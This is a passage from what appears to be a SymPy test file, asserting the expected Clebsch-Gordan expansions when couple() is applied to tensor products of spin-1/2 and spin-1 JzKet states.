(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
- 2
* sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
) == JzKetCoupled(
Rational(5, 2),
-S(5) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
# Couple j1 to j3
# j1=1/2, j2=1/2, j3=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(3, 2),
S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.One / 2),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(3, 2),
-S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
# j1=1/2, j2=1/2, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1)),
((1, 3), (1, 2)),
) == JzKetCoupled(2, 2, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(6)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(2)
* JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 3
+ sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(6)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 6
+ sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 6
+ sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 6
- sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 6
- sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 3
- sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(6)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(6)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(2)
* JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
),
((1, 3), (1, 2)),
) == JzKetCoupled(2, -2, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
# j 1=1/2, j 2=1, j 3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2))
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -2
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
+ JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
- JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -2
* JzKetCoupled(
